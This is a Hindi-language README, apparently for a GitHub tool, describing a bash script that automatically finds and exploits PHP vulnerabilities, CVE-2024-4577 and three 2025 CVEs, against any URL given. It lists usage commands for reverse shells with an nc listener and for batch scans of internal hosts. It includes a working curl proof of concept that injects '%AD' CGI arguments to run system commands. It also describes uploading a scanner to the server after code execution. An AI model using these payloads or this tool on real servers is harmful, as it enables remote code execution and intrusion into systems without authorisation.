
महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाईपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना और शोषण
महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाइपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना एवं शोषण
PHP8.1.x_Exploit.sh एक एकल फ़ाइल, शून्य-कॉन्फ़िगरेशन सुरक्षा मूल्यांकन उपकरण है जो स्वचालित रूप से कमजोर PHP एंडपॉइंट खोजता है और PHP संस्करण 8.1.34 से पहले (दिसंबर 2024 में जारी) को प्रभावित करने वाले चार उच्च-प्रभाव वाले CVE का शोषण करता है। इसमें मैन्युअल पेलोड निर्माण की आवश्यकता नहीं है – बस एक URL प्रदान करें और स्क्रिप्ट बाकी काम करती है, क्रॉलिंग से लेकर रिमोट कोड निष्पादन तक। पूर्णतः ऑटोपायलट – बिना उपयोगकर्ता संकेत के स्वचालित रूप से पता लगाता और शोषण करता है।
-d और सॉफ्ट-हाइफ़न %AD बाइपास।getimagesize() के माध्यम से हीप मेमोरी लीक
array_merge में पूर्णांक ओवरफ़्लो।parallel का उपयोग करता है, अन्यथा सुव्यवस्थित रूप से फ़ॉलबैक करता है।रूट विशेषाधिकारों की आवश्यकता नहीं – उपकरण केवल HTTP अनुरोध भेजता है और वैकल्पिक रूप से एक रिवर्स शेल निष्पादित करता है (आपकी मशीन पर लिसनर की आवश्यकता है)।
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh
एकल लक्ष्य (सबसे सामान्य)
./PHP8.1.x_Exploit.sh -u http://target.example.com
रिवर्स शेल के साथ एकल लक्ष्य (CVE-2024-4577)
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444
फिर आपकी मशीन पर:
nc -lvnp 4444
एकाधिक लक्ष्यों का बैच स्कैन
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10
उदाहरण targets.txt:
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com
केवल-स्कैन मोड (शोषण प्रयास नहीं)
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only
रिपोर्ट फ़ाइल में सहेजें
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt
वर्बोज़ / डीबग आउटपुट
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug # बहुत शोरगुल वाला
नोट: CVE‑2025‑14180 और CVE‑2025‑14178 का सटीक पता केवल सर्वर के अंदर से (स्थानीय परीक्षण) लगाया जा सकता है। स्क्रिप्ट एक सफल CGI शोषण के बाद एक स्कैनर अपलोड करके इसे प्राप्त करती है।
[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)
===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================
--revshell विकल्प लक्ष्य से आपकी मशीन पर एक सॉकेट खोलता है। सुनिश्चित करें कि आपके पास वापस कनेक्ट करने का अधिकार है।पुल रिक्वेस्ट, बग रिपोर्ट और फीचर सुझाव का स्वागत है। कृपया अनुसरण करें:
parallel के साथ और बिना दोनों तरह से परीक्षण करें।GNU जनरल पब्लिक लाइसेंस v3.0 – LICENSE फ़ाइल देखें।
सुरक्षा समुदाय के लिए 🧠 के साथ बनाया गया। नैतिक रूप से उपयोग करें।
| निर्भरता | उद्देश्य | आमतौर पर स्थापित? |
|---|
bash 4.0+ | स्क्रिप्ट इंटरप्रेटर | हाँ (Linux/macOS) |
curl | HTTP अनुरोध | हाँ |
grep, sed, awk | टेक्स्ट प्रोसेसिंग | हाँ |
mktemp | अस्थायी फ़ाइल निर्माण | हाँ |
(वैकल्पिक) parallel | तेज़ बैच स्कैनिंग | नहीं (लेकिन अनुशंसित) |
(वैकल्पिक) jq | JSON आउटपुट फ़ॉर्मेटिंग | नहीं |
| चरण | क्रिया |
|---|
| 1 | फिंगरप्रिंटिंग – हेडर और प्रोब से OS और PHP संस्करण। |
| 2 | क्रॉलिंग – होमपेज से href और action विशेषताएँ निकालता है। |
| 3 | CGI खोज – सामान्य पथ और क्रॉल किए गए लिंक जो CGI जैसे दिखते हैं, आज़माता है। |
| 4 | CVE‑2024‑4577 परीक्षण – -d और %AD दोनों पेलोड इंजेक्ट करता है; सफल होने पर कमांड निष्पादित करता है या रिवर्स शेल भेजता है। |
| 5 | अपलोड एंडपॉइंट खोज – सामान्य अपलोड पथ और "upload"/"image" वाले किसी भी फ़ॉर्म की जाँच करता है। |
| 6 | CVE‑2025‑14177 परीक्षण – एक विकृत JPEG बनाता है, इसे प्रत्येक अपलोड एंडपॉइंट पर POST करता है, हीप लीक का पता लगाता है। |
| 7 | गहन आंतरिक स्कैन – यदि RCE प्राप्त होता है, तो एक स्कैनर PHP स्क्रिप्ट अपलोड करता है और CVE‑2025‑14180 / CVE‑2025‑14178 का परीक्षण करने के लिए चलाता है। |
| 8 | रिपोर्टिंग – एक सारांश प्रिंट करता है और वैकल्पिक रूप से फ़ाइल में लिखता है। |
| विकल्प | विवरण |
|---|
-u URL | एकल लक्ष्य URL (जैसे http://example.com/) |
-l FILE | बैच फ़ाइल जिसमें प्रति पंक्ति एक URL हो |
--scan-only | केवल पता लगाएँ – शोषण न करें (कोई रिवर्स शेल नहीं, कोई पेलोड अपलोड नहीं) |
-o FILE | अंतिम रिपोर्ट FILE पर लिखें |
--threads N | बैच स्कैनिंग के लिए समानांतर थ्रेड्स की संख्या (डिफ़ॉल्ट: 5) |
--timeout N | HTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10) |
--no-color | रंगीन आउटपुट अक्षम करें |
--verbose | विस्तृत प्रगति दिखाएँ |
--debug | प्रत्येक HTTP अनुरोध दिखाएँ (संवेदनशील डेटा उजागर हो सकता है) |
--revshell IP PORT | CVE‑2024‑4577 मिलने पर रिवर्स शेल का प्रयास करें |
-h, --help | सहायता प्रदर्शित करें और बाहर निकलें |
| CVE | गंभीरता | प्रभाव | शोषण वेक्टर | संस्करण में ठीक किया गया |
|---|
| CVE‑2024‑4577 (बाइपास) | गंभीर | RCE | Windows CGI तर्क इंजेक्शन (सॉफ्ट हाइफ़न मैपिंग) | PHP 8.1.34 |
| CVE‑2025‑14177 | मध्यम/उच्च | सूचना रिसाव (हीप मेमोरी) | getimagesize() को विकृत JPEG पास करना | PHP 8.1.34 |
| CVE‑2025‑14180 | उच्च | DoS (NULL डीरेफरेंस) | अनुकरणीय प्रिपेयर + विकृत पैरामीटर \x99 के साथ PDO PostgreSQL | PHP 8.1.34 |
| CVE‑2025‑14178 | उच्च (8.2) | DoS / संभावित मेमोरी भ्रष्टाचार | विशाल सरणियों के साथ array_merge() जिससे पूर्णांक ओवरफ़्लो होता है | PHP 8.1.34 |
| समस्या | समाधान |
|---|
curl: command not found | curl स्थापित करें |
GNU parallel not found | अनदेखा किया गया – स्क्रिप्ट इसके बिना काम करती है (धीमी बैच स्कैन) |
| कोई CGI एंडपॉइंट नहीं मिला | लक्ष्य CGI का उपयोग नहीं कर सकता, या यह किसी WAF के पीछे है जो -d फ़्लैग को ब्लॉक करता है |
| CVE-2024-4577 काम करता है लेकिन रिवर्स शेल विफल रहता है | फ़ायरवॉल जाँचें; --scan-only और मैन्युअल nc लिसनर के साथ एक सरल पेलोड आज़माएँ |
| इमेज लीक परीक्षण हमेशा "No leak" लौटाता है | अपलोड एंडपॉइंट getimagesize() का उपयोग नहीं कर सकता, या यह बाइनरी डेटा को साफ़ करता है |
| स्थानीय स्कैनर अपलोड विफल रहता है | वेब रूट लिखने योग्य नहीं हो सकता; स्क्रिप्ट CGI स्क्रिप्ट के समान निर्देशिका में लिखने का प्रयास करती है |